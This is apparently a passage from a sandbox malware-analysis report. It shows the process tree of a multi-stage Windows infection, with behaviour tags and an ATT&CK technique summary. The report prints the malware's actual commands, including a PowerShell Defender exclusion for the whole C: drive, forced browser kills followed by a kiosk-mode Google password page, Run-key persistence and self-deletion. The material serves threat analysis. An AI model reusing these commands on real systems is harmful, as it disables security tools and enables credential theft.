C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381800101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10381800101\u75a1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5724 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4440 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6720
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\{a943f5ca-cfab-4e1d-a62c-6119d5fa4da9}\661d2f9c.exe"C:\Users\Admin\AppData\Local\Temp\{a943f5ca-cfab-4e1d-a62c-6119d5fa4da9}\661d2f9c.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\{5809e50d-7a7e-4f01-9afd-26a5892556c9}\81a4e8fe.exeC:/Users/Admin/AppData/Local/Temp/{5809e50d-7a7e-4f01-9afd-26a5892556c9}/\81a4e8fe.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Checks computer location settings
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{d082aa7e-6cdb-4325-8b76-01a5f4c44c90}\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca.cmd" "11⤵PID:9480
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:9668
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9744
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:9880
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9992
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10080
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10192
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10300
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10396
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10604
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:10708
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10836
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10940
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11052
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6184
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11308
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11412
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11520
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11648
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11752
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11860
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11948
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12268
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12308
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12416
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12552
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6528
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12656
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12740
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12852
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13016
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:13112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:3600
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:13288
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:13240
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13108
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13020
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12932
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca /f12⤵
- Modifies registry key
PID:12832
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381810101\17309ae496.exe"C:\Users\Admin\AppData\Local\Temp\10381810101\17309ae496.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\10381820101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10381820101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7028 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7048
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381830101\eea22fbd05.exe"C:\Users\Admin\AppData\Local\Temp\10381830101\eea22fbd05.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5352
-
-
C:\Users\Admin\AppData\Local\Temp\10381840101\bd762c8745.exe"C:\Users\Admin\AppData\Local\Temp\10381840101\bd762c8745.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7508
-
-
C:\Users\Admin\AppData\Local\Temp\10381850101\ae27dc3fa3.exe"C:\Users\Admin\AppData\Local\Temp\10381850101\ae27dc3fa3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7816
-
-
C:\Users\Admin\AppData\Local\Temp\10381860101\4258008d71.exe"C:\Users\Admin\AppData\Local\Temp\10381860101\4258008d71.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\10381870101\44f5ba506b.exe"C:\Users\Admin\AppData\Local\Temp\10381870101\44f5ba506b.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12444 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12400
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6312
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12244
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12028
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:11900
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:11864 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {a5fb7f01-ab03-4aa3-add2-06109b191565} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:11432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {13a25ef4-93c0-4c6a-8013-c0cf78272f22} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:11312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3908 -prefsLen 25164 -prefMapHandle 3912 -prefMapSize 270279 -jsInitHandle 3916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3924 -initialChannelId {c65c3630-53e4-483c-863e-6c58e675e22d} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:10984
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4088 -prefsLen 27276 -prefMapHandle 4092 -prefMapSize 270279 -ipcHandle 4116 -initialChannelId {79854ee6-5da7-4752-9f35-54c2c4aa27d3} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:10928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2832 -prefsLen 34775 -prefMapHandle 3084 -prefMapSize 270279 -jsInitHandle 3088 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4092 -initialChannelId {8db3c75a-0246-4f13-b85a-796c45adab78} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:2692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4908 -prefsLen 35012 -prefMapHandle 4912 -prefMapSize 270279 -ipcHandle 4944 -initialChannelId {cde150d9-6257-4264-a653-21fedae918db} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:2132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5116 -prefsLen 32952 -prefMapHandle 5132 -prefMapSize 270279 -jsInitHandle 5140 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4408 -initialChannelId {e2bc2d55-999c-40c3-9ab3-cf30c964c211} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:1404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5560 -prefsLen 32952 -prefMapHandle 5484 -prefMapSize 270279 -jsInitHandle 4880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4692 -initialChannelId {b4000d75-9044-4fae-a513-68831d130d95} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:1708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5904 -prefsLen 32952 -prefMapHandle 5908 -prefMapSize 270279 -jsInitHandle 5912 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5920 -initialChannelId {93a76b33-ba6e-4782-a53e-d1622f301b44} -parentPid 11864 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11864" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381880101\27b80601f6.exe"C:\Users\Admin\AppData\Local\Temp\10381880101\27b80601f6.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:10540
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:5732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6128 -ip 61281⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6140
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:5660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{d082aa7e-6cdb-4325-8b76-01a5f4c44c90}\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca.cmd"1⤵PID:556
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9424
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9504
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9644
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9768
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9932
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4576
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1836
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10268
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10384
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10508
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10640
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10748
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10972
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11088
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11196
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11344
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11504
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11772
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11904
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12024
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12180
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6264
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6380
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12508
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12640
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12760
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12988
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13076
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6752
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6428
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6980
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5172
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:13304
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:13212
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:13124
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13036
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12944
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca /f2⤵
- Modifies registry key
PID:12848
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:12780
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5656
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
6Disable or Modify Tools
5Safe Mode Boot
1Modify Registry
8Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Discovery
